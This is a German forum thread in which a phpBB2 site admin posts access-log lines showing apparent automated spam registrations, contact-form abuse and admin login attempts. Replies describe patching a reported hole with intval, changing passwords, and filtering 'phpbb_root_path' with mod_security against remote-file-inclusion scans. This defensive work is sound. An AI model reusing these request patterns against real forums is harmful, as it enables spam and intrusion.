84.108.213.215 - - [14/Dec/2007:17:05:39 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
84.108.213.215 - - [14/Dec/2007:17:05:47 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
159.148.229.75 - - [14/Dec/2007:23:20:38 -0300] "POST /phpBB2/login.php?sid=097137c9e67d58a25d3dc6a701ffbe46 HTTP/1.1" 200 16412 "-" "-"
193.110.85.247 - - [16/Dec/2007:03:13:54 -0300] "POST /phpBB2/profile.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01"
193.110.85.247 - - [16/Dec/2007:03:14:36 -0300] "POST /phpBB2/login.php HTTP/1.1" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01"
159.148.229.75 - - [17/Dec/2007:03:09:46 -0300] "POST /phpBB2/login.php?sid=d124605c0e038f1f8e159b9c57d0ee22 HTTP/1.1" 200 16412 "-" "-"
78.107.210.248 - - [17/Dec/2007:07:38:03 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)"
159.148.229.75 - - [17/Dec/2007:08:46:46 -0300] "POST /phpBB2/login.php?sid=cb5d56194fa3f48f0227c6fba723cbd0 HTTP/1.1" 200 16412 "-" "-"
159.148.229.75 - - [17/Dec/2007:08:46:53 -0300] "POST /phpBB2/profile.php?sid=be6d91ca4c26236747c6ccc2807ba6c4 HTTP/1.1" 302 - "-" "-"
159.148.229.75 - - [17/Dec/2007:13:03:29 -0300] "POST /phpBB2/login.php?sid=63ae6a98aa20d50501ad009452f04338 HTTP/1.1" 200 15365 "-" "Mozilla/5.0"
202.138.139.163 - - [17/Dec/2007:16:01:40 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC) Opera 5.0 [en]"
202.138.139.163 - - [17/Dec/2007:16:02:12 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC) Opera 5.0 [en]"
159.148.229.75 - - [18/Dec/2007:03:20:57 -0300] "POST /phpBB2/login.php?sid=40476a9432b74b815c01565ff78e0d4d HTTP/1.1" 200 16412 "-" "-"
78.107.193.165 - - [20/Dec/2007:04:30:41 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
87.118.106.4 - - [20/Dec/2007:15:35:44 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)"
78.107.216.181 - - [21/Dec/2007:03:28:45 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
87.232.1.89 - - [21/Dec/2007:07:29:22 -0300] "POST /geeklog/submit.php HTTP/1.0" 200 10611 "http://www.copaya.yi.org/geeklog/submit.php?type=story" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060602 Firefox/1.5.0.4"
78.107.143.163 - - [25/Dec/2007:04:24:41 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/4.5 (compatible; iCab 2.7.1; Macintosh; I; PPC)"
85.255.120.173 - - [27/Dec/2007:00:38:38 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1"
85.255.120.173 - - [27/Dec/2007:00:38:43 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1"
78.107.216.62 - - [27/Dec/2007:04:15:15 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
87.118.98.122 - - [28/Dec/2007:00:18:03 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
87.118.98.122 - - [28/Dec/2007:00:18:07 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
192.168.1.1 - - [28/Dec/2007:05:14:22 -0300] "POST /phpBB2/login.php HTTP/1.1" 200 3764 "http://www.copaya.yi.org/phpBB2/login.php?redirect=posting.php&mode=newtopic&f=7" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24-rc6-git2-i486-1mn; X11; i686; de, en_US) KHTML/3.5.8 (like Gecko)"
192.168.1.1 - - [28/Dec/2007:05:14:54 -0300] "POST /phpBB2/login.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/login.php?redirect=posting.php&mode=newtopic&f=7" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24-rc6-git2-i486-1mn; X11; i686; de, en_US) KHTML/3.5.8 (like Gecko)"
192.168.1.1 - - [28/Dec/2007:05:28:33 -0300] "POST /phpBB2/posting.php HTTP/1.1" 200 3790 "http://www.copaya.yi.org/phpBB2/posting.php?mode=newtopic&f=7&sid=db7b36bcb634b89fa15edaf9fce2db2e" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24-rc6-git2-i486-1mn; X11; i686; de, en_US) KHTML/3.5.8 (like Gecko)"
78.107.209.112 - - [28/Dec/2007:05:35:58 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/4.01 (Compatible; Acorn Phoenix 2.08 [intermediate]; RISC OS 4.39) Acorn-HTTP/0.84"
78.107.223.227 - - [31/Dec/2007:22:21:41 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
78.107.197.113 - - [01/Jan/2008:12:53:12 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/5.0 (Windows; U; WinNT4.0; en-CA; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1"
78.107.219.214 - - [02/Jan/2008:12:44:23 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
203.144.144.164 - - [05/Jan/2008:13:19:59 -0300] "POST /phpBB2/profile.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6"
203.144.144.164 - - [05/Jan/2008:13:20:46 -0300] "POST /phpBB2/login.php HTTP/1.1" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6"
87.232.1.88 - - [06/Jan/2008:11:58:10 -0300] "POST /geeklog/submit.php HTTP/1.0" 200 10610 "http://www.copaya.yi.org/geeklog/submit.php?type=story" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5"
91.76.104.196 - - [08/Jan/2008:16:45:35 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051019 Flock/0.4 Firefox/1.0+"
87.118.98.122 - - [09/Jan/2008:23:48:23 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.1) Gecko/Debian-1.8.0.1-5 Epiphany/1.8.5"
87.118.98.122 - - [09/Jan/2008:23:48:28 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.1) Gecko/Debian-1.8.0.1-5 Epiphany/1.8.5"
88.224.107.14 - - [10/Jan/2008:16:48:37 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/0.91 Beta (Windows)"
88.224.107.14 - - [10/Jan/2008:16:48:45 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/0.91 Beta (Windows)"
216.32.70.162 - - [12/Jan/2008:21:32:17 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
216.32.70.162 - - [12/Jan/2008:21:32:37 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
78.107.223.235 - - [13/Jan/2008:20:21:40 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7 (Ubuntu package 1.0.7)"
85.21.125.100 - - [13/Jan/2008:22:15:23 -0300] "POST /phpBB2/profile.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true&sid=af4ab06c0135c551f6df7261e507a141" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
85.255.120.158 - - [14/Jan/2008:08:00:31 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20041122 Firefox/0.5.6+"
85.255.120.158 - - [14/Jan/2008:08:00:42 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20041122 Firefox/0.5.6+"
87.232.1.50 - - [14/Jan/2008:10:17:02 -0300] "POST /geeklog/submit.php HTTP/1.0" 200 10610 "http://www.copaya.yi.org/geeklog/submit.php?type=story" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
195.2.114.28 - - [15/Jan/2008:03:58:13 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
195.2.114.28 - - [15/Jan/2008:03:58:26 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.107.205.3 - - [15/Jan/2008:04:10:14 -0300] "POST /phpBB2/kontakt_post.php HTTP/1.0" 200 14391 "http://www.copaya.yi.org/phpBB2/kontakt.php?sid=203a1355f6efe4b524bd4973ed681507" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
67.205.68.203 - - [15/Jan/2008:09:06:18 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15423 "http://www.copaya.yi.org/phpBB2/login.php?redirect=posting.php&mode=newtopic&f=7" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126"
85.12.46.89 - - [15/Jan/2008:12:05:41 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
85.12.46.89 - - [15/Jan/2008:12:05:57 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
217.175.175.71 - - [15/Jan/2008:19:07:30 -0300] "POST /phpBB2/login.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/login.php?sid=814bfcc34f35c340fa2d0884c9884895" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24-rc6-git8-i486-1mn; X11; i686; de, en_US) KHTML/3.5.8 (like Gecko)"
217.175.175.71 - - [15/Jan/2008:19:08:10 -0300] "POST /phpBB2/login.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/login.php?redirect=admin/index.php&admin=1&sid=814bfcc34f35c340fa2d0884c9884895" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24-rc6-git8-i486-1mn; X11; i686; de, en_US) KHTML/3.5.8 (like Gecko)"
72.36.246.52 - - [16/Jan/2008:02:53:17 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)"
72.36.246.52 - - [16/Jan/2008:02:53:27 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)"
68.113.199.111 - - [16/Jan/2008:14:10:51 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Opera/9.01 (Windows NT 5.1; U; en)"
68.113.199.111 - - [16/Jan/2008:14:11:17 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Opera/9.01 (Windows NT 5.1; U; en)"
84.19.188.173 - - [16/Jan/2008:16:47:50 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
84.19.188.173 - - [16/Jan/2008:16:48:06 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.175.174.98 - - [16/Jan/2008:17:36:36 -0300] "POST /phpBB2/login.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/login.php?sid=72c2afc54afba184b5e3773ffd05c5d9" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24-rc6-git8-i486-1mn; X11; i686; de, en_US) KHTML/3.5.8 (like Gecko)"
217.175.174.98 - - [16/Jan/2008:17:37:10 -0300] "POST /phpBB2/login.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/login.php?redirect=admin/index.php&admin=1&sid=72c2afc54afba184b5e3773ffd05c5d9" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24-rc6-git8-i486-1mn; X11; i686; de, en_US) KHTML/3.5.8 (like Gecko)"

MOD : siehe oben
 
Last edited by a moderator:
Ganz genau das war vor einiger Zeit mal von phpBB2 als Sicherheitslücke gemeldet worden, ich hatte daraufhin diese (und andere) Sprachdateien abgeändert. Wie ich hoffe, richtig. Waren denn diese Angriffe bei mir erfolgreich ? Dann ist es evtl besser das an phpBB2 zu melden weil dann die empfohlenen Vorkehrungen unzureichend sind. Ich überprüfe aber noch mal, ob bei mir nicht die betr. Änderungen die ich damals gemacht hatte, wieder verschwunden sind ...

Nachtrag. Ich habe jetzt die in allen o.g. links und dort wiederum enthaltenen links enthaltenen Warnungen überprüft. Entsprechend einer früheren Warnung im phpBB2-Forum hatte ich in div. Sprachen-Dateien $_GET in intval ($HTTP_GET_VARS) geändert, die Warnung daß das auch in links.php nötig ist, hatte ich aber nicht gesehen, und dies daher erst jetzt durchgeführt. Ferner die Hinzufüfung gleich nach dem header in lang_main_album , lang_admin_album aller Sprachdateien. Ferner habe ich, da der Beschreibung nach die Passworte gelesen werden können, alle admin-passwords geändert. Und e-mails gehen künftig (wie auch bei sendmail) über smtp.ool.fr vom Provider. Dem habe ich schon die Anweisung gegeben, nur eine bestimmte beschränkte Zahl pro Std. und pro Tag von meinem Rechner rausgehen zu lassen, wenn wirklich jemand spammt, hat der nun die Verantwortung nach dem Verbraucherschutzgesetz.

Was kann man sonst noch tun ?
 
Last edited by a moderator:
Mod Security wäre zu Empfehlen, damit hast du Ruhe vor der phpbb_root_path-Scannerei, einfach den Textstring "phpbb_root_path" filtern und du kannst Nachts, wenn es GANZ ruhig ist, die Skiddies weinen hören...^^

Ich betreibe eine recht gut frequentierte phpnuke/phpbb Site, an "guten" Tagen sind 100 solcher RFI-Versuche keine Seltenheit.
 
Back
Top